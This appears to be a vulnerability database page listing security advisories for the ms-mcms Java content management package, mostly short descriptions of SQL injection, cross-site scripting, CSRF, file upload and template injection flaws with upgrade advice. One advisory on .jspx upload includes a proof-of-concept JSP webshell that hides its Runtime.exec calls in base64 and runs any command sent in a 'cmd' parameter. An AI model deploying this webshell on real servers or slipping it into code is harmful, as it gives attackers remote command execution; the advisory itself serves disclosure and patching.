net.mingsoft:ms-mcms@4.6.3-SNAPSHOTS vulnerabilities

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') due to the front-end file upload process. An attacker can execute arbitrary commands on the server by uploading a malicious file.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type via a crafted POST request to /ms/file/upload.do, due to improper filtering for file extensions. An attacker can upload arbitrary files, potentially leading to remote code execution or other malicious activities.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Information Exposure via a crafted script to the password parameter. An attacker can obtain sensitive information by sending a specially crafted request to the affected parameter.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the categoryType parameter at /content/list.do. An attacker can manipulate the backend database by injecting malicious SQL commands.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in search.do, which is exploitable via HTTP POST Request involving the content_title parameter.

Upgrade net.mingsoft:ms-mcms to version 5.3.2 or higher.

Affected versions of this package are vulnerable to Arbitrary File Upload via a crafted thumbnail. Exploiting this vulnerability might result in arbitrary code execution.

Note: This vulnerability impacts only Windows operation system.

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

Affected versions of this package are vulnerable to SQL Injection via the basic_title parameter.

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

Affected versions of this package are vulnerable to Arbitrary File Upload via the ms/template/writeFileContent.do component.

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization when saving or updating articles.

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

Affected versions of this package are vulnerable to SQL Injection due to improper sanitization, via the /cms/category/list endpoint.

Upgrade net.mingsoft:ms-mcms to version 5.2.10 or higher.

Affected versions of this package are vulnerable to SQL Injection via model lists in /mdiy/model/delete URI.

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

Affected versions of this package are vulnerable to SQL Injection via the fieldName parameter in the /mdiy/page/verify URI.

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

Affected versions of this package are vulnerable to Arbitrary File Upload via the TemplateAction class. Exploiting this vulnerability is possible by uploading a zip file to the TemplateAction API, with a jsp file, thus bypassing the file upload filter implemented in the upload functionality.

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via ms/basic/manager/save.do.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Upload by allowing an attacker to execute arbitrary code through a crafted ZIP file.

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/list/ URI via orderBy parameter.

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/listExcludeApp URI via the orderBy parameter.

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

Affected versions of this package are vulnerable to SQL Injection via the orderBy parameter at /dict/list.do.

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via /role/saveOrUpdateRole.do which allows attackers to escalate privileges and modify data.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via /cms/content/list. This is due to a lack of filtering and escaping of SQL data.

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). By using a freemarker template function called Execute.

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

Affected versions of this package are vulnerable to SQL Injection via the categoryId parameter in IContentDao.xml.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via search.do in the file /mdiy/dict/listExcludeApp.

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

Affected versions of this package are vulnerable to SQL Injection via search.do in /web/MCmsAction.java.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to External Control of File Name or Path via the oldFileName variable of the writeFileContent function. If this variable is not equal to the fileName variable, the oldFileName file gets deleted.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlaying server.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.

##PoC

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary File Deletion via the unZip() function in net/mingsoft/basic/action/TemplateAction.java, where after unzipping the file specified is deleted (whether it exists or not).

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the orderby parameter which isn't handled correctly through the /mcms/view.do endpoint while unauthenticated.

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

Affected versions of this package are vulnerable to Arbitrary File Upload via the upload method. The only files that are restricted for upload are .exe and .jsp. This can lead to RCE when a webshell with a .jspx type, for example, is uploaded this way.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of orderBy is directly spliced into the SQL statement without any filtering, allowing to exfiltrate sensitive data.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the queryDiyFormData method. The way it is implemented allows the orderBy value to be injected into the statement when resolving a GET request.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Arbitrary Code Execution in the New Template module. It allows attackers to upload malicious zip archives, upload a new template, and add malicious code in the template to realize command execution.

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

Affected versions of this package are vulnerable to Arbitrary File Upload via the com\mingsoft\basic\action\web\FileAction.java component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie.

There is no fixed version for net.mingsoft:ms-mcms.

Affected versions of this package are vulnerable to Directory Traversal via the com\mingsoft\cms\action\GeneraterAction.java file. An attacker can write a .jsp file to an arbitrary directory via a ../ Directory Traversal in the url parameter.

There is no fixed version for net.mingsoft:ms-mcms.